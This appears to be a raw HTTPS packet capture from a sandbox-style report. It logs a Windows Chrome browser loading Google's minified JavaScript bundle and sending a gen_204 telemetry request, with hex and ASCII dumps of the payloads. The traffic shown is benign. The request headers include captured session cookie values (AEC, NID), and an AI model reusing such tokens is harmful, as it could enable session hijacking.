2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 94 29 55 9e ac 55 01 c4 ac 54 15 65 ce a4 59 d3 e6 4d 9c 39 75 ee e4 d9 d3 e7 ce 54 41 83 b6 22 3a 6b d6 12 31 63 40 e4 a8 d5 14 5c 8a 28 4d 6b bd 4a e1 88 48 03 a3 b3 88 12 55 26 0d 83 07 0f f5 30 ae a2 b0 eb e7 ce 00 63 17 9a 8d 08 62 e5 ab 5a 8d 68 1e 20 90 ab 66 83 a9 2b 4d 40 54 c5 62 e0 5f 81 d6 78 ca a2 6b 97 91 35 c0 7f 85 40 44 a8 96 ec c3 b3 ba 1c 6b 94 c8 f1 a3 c7 90 23 4b be e5 cc 32 47 9b 46 ad ce 8e 26 5d da f4 69 d4 a9 29 0a 4d b5 35 eb 18 31 8d 96 36 bd 96 62 92 ff d4 57 e0 7a 98 21 92 75 2b d1 54 ed 2e 95 23 5e 0e 63 00 d5 15 77 25 54 8b 61 22 08 dc 29 41 cc a4 43 00 97 cd 46 79 55 4e 67 a4 4a 48 e2 81 6f 78 d2 bd 0e f1 0d 78 81 e2 21 62 70 bc 4a d7 e8 5b 93 37 5e c6 2c 12 a2 89 ce 9c 73 b8 84 c9 d3 17 2e 5f 64 49 6e 40 02 0b 34 b0 34 d6 Data Ascii: )UUTeYM9uTA":k1c@\(MkJHU&0cbZh f+M@Tb_xk5@Dk#K2GF&]i)M516bWz!u+T.#^cw%Ta")ACFyUNgJHoxx!bpJ[7^,s._dIn@44
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 0d 3c b1 2c 1a 8e 55 11 00 95 40 00 a0 37 91 d8 cd ae 49 40 cc c1 29 6a d1 06 a9 05 2a 28 b3 68 44 1b 1e 97 3a 86 4e 91 16 0f a0 45 63 1d eb 58 c6 3a e3 ff 0d ec f0 82 17 3a aa 8a 58 58 e3 0d b5 44 8f 33 84 c1 88 65 1c c1 08 f1 a8 86 2d e0 60 52 02 c0 a0 3d 2a a5 c3 2e 06 7a 90 5d e8 22 00 a2 53 5a 65 62 3a 40 88 70 6b 5f fc d9 18 44 02 86 0d 40 98 e1 0b d0 04 aa 50 f1 21 83 2b 20 b7 02 0d c8 80 61 22 a8 54 a6 46 97 8e 4e d5 1d 51 a6 21 86 25 00 af 36 29 e8 41 0b 6c a0 84 09 ec 80 18 42 f1 ea 21 69 ab 96 6e a4 b6 1e 14 60 6f 3d e4 a4 52 1a 2e a4 14 14 90 00 01 5e 00 50 bb ca e4 00 51 8c 48 2e c4 10 89 ef 41 8d 5f 6d 30 41 81 4d 60 d8 c3 7a eb 94 32 b1 46 31 1e fb e0 c7 6e 83 1e 6e 10 02 0b 58 e0 8c 90 4a 6a 00 78 50 87 30 14 b0 89 21 24 02 0e 89 c8 80 49 Data Ascii: <,U@7I@)j(hD:NEcX::XXD3e-`R=.z]"SZeb:@pk_D@P!+ a"TFNQ!%6)AlB!in`o=R.^PQH.A_m0AM`z2F1nnXJjxP0!$I
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: c0 06 28 f2 25 9d 50 1c 5f 40 85 d8 f2 81 4b a0 81 4b c0 00 a6 c4 00 18 80 81 00 f0 81 62 7c 36 88 38 c6 fe 63 86 13 28 84 2e 28 81 2e 50 46 68 04 07 15 20 40 02 dc 82 18 fc 9d 02 6b 03 b4 24 b0 1c 6b 80 56 18 39 9e 39 87 9f d9 49 b9 94 4b 6a 90 9e 9e 89 38 55 50 06 cd 12 82 0a b3 b0 0b 13 82 37 b0 06 77 94 08 61 a8 06 a6 03 00 23 80 05 36 f0 c0 0f 0c 83 05 30 a8 89 18 06 5d 60 ab 4b 78 2b a7 7c 01 1f d0 85 cf 31 a1 f3 72 0f 9f 10 47 b7 ab 08 8d cb ae b3 8c 84 16 e0 0d 22 b0 03 28 88 09 c5 c9 45 9a 88 07 02 28 84 4b f0 03 3f 38 84 10 44 c5 55 04 02 54 08 07 51 d0 3b d2 aa 49 e0 54 18 ff 10 68 84 fd 5a 00 a1 94 09 55 90 85 3c 89 06 b9 c3 85 90 a4 09 83 9b 08 7d 40 15 5b b0 85 6f 28 8c 99 b0 ca fe 23 82 3d 30 80 13 10 01 f0 5c 83 35 d8 03 15 e8 01 b1 b4 03 Data Ascii: (%P_@KKb\|68c(.(.PFh @k$kV99IKj8UP7wa#60]`Kx+\|1rG"(E(K?8DUTQ;IThZU<}@[o(#=0\5
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: d3 88 05 6d d0 82 16 c8 15 93 4d 0d 18 66 64 66 28 83 3d c8 04 59 fd de 2e 10 cf 1c 26 87 75 d0 e4 4d a6 09 38 c0 06 1a 99 b2 1e 10 0d 24 7e 5c 5e b0 06 06 18 04 7f ce 80 27 76 82 0f b8 03 4c 58 65 57 86 65 9f 10 86 99 54 8e ce ec 59 01 96 89 13 84 17 d0 29 bc ff a3 45 3f c3 1b 84 80 a1 3b 03 31 07 23 f8 04 2f 98 01 3a 06 5e 05 a8 03 96 ac 02 54 40 83 4a 8d e6 f0 4b a5 28 20 db 9b 72 45 9d fd 09 a1 63 00 2f c8 00 b2 e5 38 37 33 8d 71 66 86 12 f8 82 42 28 83 ef 0d ea ef 9d 83 2d 30 80 2d d0 4e 1f d6 2f 31 48 c0 8c 4c 81 46 c8 e7 58 e0 05 5e e0 00 37 58 81 61 ad ac 81 de 86 6d 28 06 16 e0 00 4c f0 82 c6 85 5c fd 24 10 ac 73 8c b2 82 68 1f 68 68 85 b8 65 fe 09 02 5e 46 3f 2c 53 02 1e 70 07 7d 80 66 d2 10 06 5e e0 c0 47 45 02 0a 2e c2 3a 28 80 90 6e 49 5b 48 Data Ascii: mMfdf(=Y.&uM8$~\^'vLXeWeTY)E?;1#/:^T@JK( rEc/873qfB(-0-N/1HLFX^7Xam(L\$shhhe^F?,Sp}f^GE.:(nI[H
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 40 61 a8 53 ab ce 09 6b fa f4 d8 d4 65 23 3a e4 95 99 ed 07 b7 70 13 f4 eb 97 80 45 dd 84 c5 0a 30 74 68 56 e2 e4 e0 c2 87 13 2f 6e fc 38 f2 8a b1 0e 64 38 97 f9 a8 d2 4f 07 16 c8 0a 2d 95 6a 69 a9 a7 c3 32 9b 73 35 35 54 9d 66 5b bb 66 b1 8d a0 c1 b7 49 93 e2 b6 bb 9b 01 14 df 66 55 ca 42 95 fc 3e fe fc fa f7 f3 6f 09 f1 9c 17 07 68 c3 ce 66 6e 84 f2 99 2d 8e b9 d2 1d 33 a9 a1 b6 60 55 0d 92 b5 d3 78 e4 bd f1 cb 40 70 b1 b0 5e 52 06 25 c4 02 3b 0c 9c 83 d6 6f 28 e5 d2 04 2c bb f4 b7 22 8b 2d ba f8 e2 4f be 2c e0 c5 67 5e d0 88 4b 64 e0 41 c5 60 6a cc 90 a6 1a 85 ac 91 57 40 31 e7 15 54 0c 87 ec d9 b5 01 3b 5e 68 43 e2 7c 19 d9 92 41 06 28 aa 58 11 2a f6 c1 b8 25 97 5d 7a 79 9f 2d b9 e4 e2 ff 4b 82 c1 39 48 95 84 51 4d 35 47 76 ae f8 54 61 5a ae bd 21 d0 Data Ascii: @aSke#:pE0thV/n8d8O-ji2s55Tf[fIfUB>ohfn-3`Ux@p^R%;o(,"-O,g^KdA`jW@1T;^hC\|A(X*%]zy-K9HQM5GvTaZ!

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:15 UTC	3958	OUT	GET /xjs/_/js/k=xjs.hd.en_US.n9glp8jBN-0.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAABQAAACAAAAAAEAAAAAAAAAAQBBAEAQAAAEAAAAsAAAQDACAAAAAAgAAIACAR5kCgAARAAAAACAAgACAAAAAAgAAAAEAAAAAAAAFAAAAAAACAAAAAAAAAAACBAAAAAAAAAAAAAgAAEAPAAAAAAAAAAgIAACGgAEIAAAAAAAA6AOA4AEYUlgAAAAAAAAAAAAAAAAIkCCYCwkoCEAAAAAAAAAAAAAAAAAAAJEmLmw/d=1/ed=1/dg=3/br=1/rs=ACT90oHriNedtl0slfHQQK7yvtGqa3GaPw/ee=ALeJib:B8gLwd;AfeaP:TkrAjf;BMxAGc:E5bFse;BgS6mb:fidj5d;BjwMce:cXX2Wb;CxXAWb:YyRLvc;DULqB:RKfG5c;Dkk6ge:JZmW9e;DpcR3d:zL72xf;EABSZ:MXZt9d;ESrPQc:mNTJvc;EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;EnlcNd:WeHg4;F9mqte:UoRcbe;Fmv9Nc:O1Tzwc;G0KhTb:LIaoZ;G6wU6e:hezEbd;GleZL:J1A7Od;HMDDWe:G8QUdb;HoYVKb:PkDN7e;HqeXPd:cmbnH;IBADCc:RYquRb;IoGlCf:b5lhvb;IsdWVc:qzxzOb;JXJSm:ii1RGf;JXS8fb:Qj0suc;JbMT3:M25sS;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;KOxcK:OZqGte;KQzWid:ZMKkN;KcokUb:KiuZBf;KpRAue:Tia57b;LBgRLc:SdcwHb,XVMNvd;LEikZe:byfTOb,lsjVmc;LXA8b:q7OdKd;LsNahb:ucGLNb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Np8Qkd:Dpx6qc;Nyt6ic:jn2sGd;OgagBe:cNTe0;OohIYe:mpEAQb;Pjplud [TRUNCATED] Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; NID=519=3OrxmPkMvBr9I47ilVaxvzah5U2M_Kv6Yl09ezOWk23mPh_ZiKYUkrBeb4HRWulzj7FiEWCih8V8_6rA1LKLquM-6_4wQwH9Jg3cC2v3NsqDexSH57TdkEHJM1suOLER9Jc69KsNU_sP5FIKCNNDQa-7opLPHDMhczuUH9MISmOv_0sf5sAY6JpEePiRF3sRMHKiemHX
2024-12-04 11:20:16 UTC	819	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Vary: Accept-Encoding, Origin Content-Type: text/javascript; charset=UTF-8 Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1140998 Date: Wed, 04 Dec 2024 11:20:16 GMT Expires: Thu, 04 Dec 2025 11:20:16 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Tue, 03 Dec 2024 22:30:27 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-04 11:20:16 UTC	571	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 34 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0// Copyright Google LLC SPDX-License-Identifier: Apache-2.0// Copyright 2024 Google, Inc SPDX-License-Id
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 2c 6d 63 61 2c 6e 63 61 2c 6f 63 61 2c 68 63 61 2c 70 63 61 2c 65 63 61 2c 71 63 61 2c 64 63 61 2c 66 63 61 2c 67 63 61 2c 72 63 61 2c 73 63 61 2c 74 63 61 2c 44 63 61 2c 45 63 61 2c 49 63 61 2c 4a 63 61 2c 4e 63 61 2c 51 63 61 2c 4b 63 61 2c 50 63 61 2c 4f 63 61 2c 4d 63 61 2c 4c 63 61 2c 52 63 61 2c 53 63 61 2c 54 63 61 2c 56 63 61 2c 24 63 61 2c 61 64 61 2c 69 64 61 2c 6a 64 61 2c 6b 64 61 2c 6c 64 61 2c 6d 64 61 2c 6e 64 61 2c 62 64 61 2c 6f 64 61 2c 72 64 61 2c 74 64 61 2c 73 64 61 2c 76 64 61 2c 78 64 61 2c 77 64 61 2c 7a 64 61 2c 79 64 61 2c 43 64 61 2c 42 64 61 2c 44 64 61 2c 48 64 61 2c 49 64 61 2c 4c 64 61 2c 4e 64 61 2c 51 64 61 2c 52 64 61 2c 54 64 61 2c 4d 62 2c 5a 64 61 2c 62 65 61 2c 67 65 61 2c 6a 65 61 2c 6b 65 61 2c 6d 65 61 2c 4c 62 2c Data Ascii: ,mca,nca,oca,hca,pca,eca,qca,dca,fca,gca,rca,sca,tca,Dca,Eca,Ica,Jca,Nca,Qca,Kca,Pca,Oca,Mca,Lca,Rca,Sca,Tca,Vca,$ca,ada,ida,jda,kda,lda,mda,nda,bda,oda,rda,tda,sda,vda,xda,wda,zda,yda,Cda,Bda,Dda,Hda,Ida,Lda,Nda,Qda,Rda,Tda,Mb,Zda,bea,gea,jea,kea,mea,Lb,
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 61 2c 52 75 61 2c 5a 75 61 2c 24 75 61 2c 62 76 61 2c 68 76 61 2c 6b 76 61 2c 6a 76 61 2c 6c 76 61 2c 6d 76 61 2c 70 76 61 2c 73 76 61 2c 74 76 61 2c 77 76 61 2c 78 76 61 2c 79 76 61 2c 7a 76 61 2c 42 76 61 2c 41 76 61 2c 43 76 61 2c 47 76 61 2c 50 76 61 2c 51 76 61 2c 52 76 61 2c 53 76 61 2c 54 76 61 2c 55 76 61 2c 56 76 61 2c 57 76 61 2c 63 77 61 2c 65 77 61 2c 66 77 61 2c 67 77 61 2c 68 77 61 2c 69 77 61 2c 6a 77 61 2c 6b 77 61 2c 70 77 61 2c 73 77 61 2c 76 77 61 2c 78 77 61 2c 7a 77 61 2c 44 77 61 2c 45 77 61 2c 46 77 61 2c 47 77 61 2c 4a 77 61 2c 4b 77 61 2c 4d 77 61 2c 50 77 61 2c 4e 77 61 2c 5a 77 61 2c 66 78 61 2c 69 78 61 2c 68 78 61 2c 6b 78 61 2c 6c 78 61 2c 6d 78 61 2c 6e 78 61 2c 4e 68 2c 6f 78 61 2c 77 78 61 2c 78 78 61 2c 50 68 2c 79 78 61 Data Ascii: a,Rua,Zua,$ua,bva,hva,kva,jva,lva,mva,pva,sva,tva,wva,xva,yva,zva,Bva,Ava,Cva,Gva,Pva,Qva,Rva,Sva,Tva,Uva,Vva,Wva,cwa,ewa,fwa,gwa,hwa,iwa,jwa,kwa,pwa,swa,vwa,xwa,zwa,Dwa,Ewa,Fwa,Gwa,Jwa,Kwa,Mwa,Pwa,Nwa,Zwa,fxa,ixa,hxa,kxa,lxa,mxa,nxa,Nh,oxa,wxa,xxa,Ph,yxa
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 64 2e 73 75 62 61 72 72 61 79 28 30 2c 63 29 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 64 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 63 61 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 61 3b 7d 2c 30 29 7d 3b 5f 2e 65 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5f 2e 63 61 2e 6e 61 76 69 67 61 74 6f 72 3b 72 65 74 75 72 6e 20 61 26 26 28 61 3d 61 2e 75 73 65 72 41 67 65 6e 74 29 3f 61 3a 22 22 7d 3b 69 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 68 61 61 3f 5f 2e 66 61 3f 5f 2e 66 61 2e 62 72 61 6e 64 73 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 28 62 3d 62 2e 62 72 61 6e 64 29 26 26 5f 2e 68 61 28 62 2c 61 29 7d 29 3a 21 31 3a 21 31 7d 3b 5f Data Ascii: d.subarray(0,c)}return a};_.da=function(a){_.ca.setTimeout(function(){throw a;},0)};_.ea=function(){var a=_.ca.navigator;return a&&(a=a.userAgent)?a:""};iaa=function(a){return _.haa?_.fa?_.fa.brands.some(function(b){return(b=b.brand)&&_.ha(b,a)}):!1:!1};_
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 28 61 29 7b 76 61 72 20 62 3d 2f 72 76 3a 20 2a 28 5b 5c 64 5c 2e 5d 2a 29 2f 2e 65 78 65 63 28 61 29 3b 69 66 28 62 26 26 62 5b 31 5d 29 72 65 74 75 72 6e 20 62 5b 31 5d 3b 62 3d 22 22 3b 76 61 72 20 63 3d 2f 4d 53 49 45 20 2b 28 5b 5c 64 5c 2e 5d 2b 29 2f 2e 65 78 65 63 28 61 29 3b 69 66 28 63 26 26 63 5b 31 5d 29 69 66 28 61 3d 2f 54 72 69 64 65 6e 74 5c 2f 28 5c 64 2e 5c 64 29 2f 2e 65 78 65 63 28 61 29 2c 63 5b 31 5d 3d 3d 22 37 2e 30 22 29 69 66 28 61 26 26 61 5b 31 5d 29 73 77 69 74 63 68 28 61 5b 31 5d 29 7b 63 61 73 65 20 22 34 2e 30 22 3a 62 3d 22 38 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 35 2e 30 22 3a 62 3d 22 39 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 36 2e 30 22 3a 62 3d 22 31 30 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 Data Ascii: (a){var b=/rv: ([\d\.])/.exec(a);if(b&&b[1])return b[1];b="";var c=/MSIE +([\d\.]+)/.exec(a);if(c&&c[1])if(a=/Trident\/(\d.\d)/.exec(a),c[1]=="7.0")if(a&&a[1])switch(a[1]){case "4.0":b="8.0";break;case "5.0":b="9.0";break;case "6.0":b="10.0";break;case
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 68 22 29 7d 3b 5f 2e 7a 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 4c 69 6e 75 78 22 3a 5f 2e 6c 61 28 22 4c 69 6e 75 78 22 29 7d 3b 5f 2e 41 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 57 69 6e 64 6f 77 73 22 3a 5f 2e 6c 61 28 22 57 69 6e 64 6f 77 73 22 29 7d 3b 42 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 77 61 61 28 29 3f 5f 2e 66 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 22 43 68 72 6f 6d 65 20 4f 53 22 3a 5f 2e 6c 61 28 22 43 72 4f 53 22 29 7d 3b 0a 5f 2e 43 61 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 5f 2e 65 61 28 29 2c 62 3d 22 22 3b 5f 2e Data Ascii: h")};_.zaa=function(){return waa()?_.fa.platform==="Linux":_.la("Linux")};_.Aaa=function(){return waa()?_.fa.platform==="Windows":_.la("Windows")};Baa=function(){return waa()?_.fa.platform==="Chrome OS":_.la("CrOS")};_.Caa=function(){var a=_.ea(),b="";_.
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 7d 3b 5f 2e 44 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 43 61 28 61 2c 62 29 7c 7c 61 2e 70 75 73 68 28 62 29 7d 3b 5f 2e 46 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 3d 5f 2e 42 61 28 61 2c 62 29 3b 76 61 72 20 63 3b 28 63 3d 62 3e 3d 30 29 26 26 5f 2e 45 61 28 61 2c 62 29 3b 72 65 74 75 72 6e 20 63 7d 3b 5f 2e 45 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 70 6c 69 63 65 2e 63 61 6c 6c 28 61 2c 62 2c 31 29 2e 6c 65 6e 67 74 68 3d 3d 31 7d 3b 0a 5f 2e 47 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 30 3b 5f 2e 79 61 28 61 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 62 2e 63 61 6c 6c 28 76 6f 69 64 20 30 2c 64 2c 65 2c 61 29 26 26 5f Data Ascii: };_.Da=function(a,b){_.Ca(a,b)\|\|a.push(b)};_.Fa=function(a,b){b=_.Ba(a,b);var c;(c=b>=0)&&_.Ea(a,b);return c};_.Ea=function(a,b){return Array.prototype.splice.call(a,b,1).length==1};_.Gaa=function(a,b){var c=0;_.ya(a,function(d,e){b.call(void 0,d,e,a)&&_
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 3d 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 64 3d 61 2e 6c 65 6e 67 74 68 3b 63 3d 63 7c 7c 4e 61 61 3b 66 6f 72 28 76 61 72 20 65 3d 30 3b 65 3c 64 3b 65 2b 2b 29 69 66 28 21 63 28 61 5b 65 5d 2c 62 5b 65 5d 29 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 3b 5f 2e 4c 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3e 62 3f 31 3a 61 3c 62 3f 2d 31 3a 30 7d 3b 4e 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 7d 3b 0a 5f 2e 4f 61 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 7b 7d 3b 5f 2e 51 61 28 61 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 65 29 7b 63 5b 62 2e 63 61 6c 6c 28 76 6f 69 64 20 30 2c 64 2c 65 2c 61 29 5d 3d 64 7d 29 3b 72 65 Data Ascii: =b.length)return!1;var d=a.length;c=c\|\|Naa;for(var e=0;e<d;e++)if(!c(a[e],b[e]))return!1;return!0};_.Laa=function(a,b){return a>b?1:a<b?-1:0};Naa=function(a,b){return a===b};_.Oaa=function(a,b){var c={};_.Qa(a,function(d,e){c[b.call(void 0,d,e,a)]=d});re
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 3b 69 66 28 63 21 3d 3d 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 76 61 72 20 64 3d 30 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 61 5b 64 5d 21 3d 3d 62 5b 64 5d 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 3b 5f 2e 61 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 6c 65 6e 67 74 68 3d 3d 30 3f 5f 2e 56 61 28 29 3a 6e 65 77 20 5f 2e 57 61 28 61 2c 5f 2e 59 61 29 7d 3b 0a 63 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 29 72 65 74 75 72 6e 7b 62 75 66 66 65 72 3a 59 61 61 28 61 29 2c 6b 55 3a 21 31 7d 3b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 29 72 65 Data Ascii: ion(a,b){var c=a.length;if(c!==b.length)return!1;for(var d=0;d<c;d++)if(a[d]!==b[d])return!1;return!0};_.aba=function(a){return a.length==0?_.Va():new _.Wa(a,_.Ya)};cba=function(a){if(typeof a==="string")return{buffer:Yaa(a),kU:!1};if(Array.isArray(a))re
2024-12-04 11:20:16 UTC	1390	IN	Data Raw: 61 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 61 5b 63 5d 2c 65 3d 62 5b 63 5d 3b 69 66 28 64 3e 65 29 72 65 74 75 72 6e 21 31 3b 69 66 28 64 3c 65 29 72 65 74 75 72 6e 21 30 7d 7d 3b 6f 62 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 3e 3e 3e 30 3b 5f 2e 64 62 3d 62 3b 5f 2e 65 62 3d 28 61 2d 62 29 2f 34 32 39 34 39 36 37 32 39 36 3e 3e 3e 30 7d 3b 0a 5f 2e 67 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 3c 30 29 7b 6f 62 61 28 2d 61 29 3b 76 61 72 20 62 3d 5f 2e 66 62 28 70 62 61 28 5f 2e 64 62 2c 5f 2e 65 62 29 29 3b 61 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 62 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 5f 2e 64 62 3d 61 3e 3e 3e 30 3b 5f 2e 65 62 3d 62 3e 3e 3e 30 7d 65 6c 73 65 20 6f 62 61 28 61 Data Ascii: a.length;c++){var d=a[c],e=b[c];if(d>e)return!1;if(d<e)return!0}};oba=function(a){var b=a>>>0;_.db=b;_.eb=(a-b)/4294967296>>>0};_.gb=function(a){if(a<0){oba(-a);var b=_.fb(pba(_.db,_.eb));a=b.next().value;b=b.next().value;_.db=a>>>0;_.eb=b>>>0}else oba(a

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:16 UTC	1469	OUT	POST /gen_204?s=webhp&t=cap&atyp=csi&ei=7TpQZ5ybCP7V7M8PhYbCIQ&rt=wsrt.6131,cbt.219,hst.103&opi=89978449&dt=&ts=300 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-WeTnuoWrBIDC1GVWeym6UxsHlGVLoJdGSAZLJ8s_4V8Y96UFLenA; 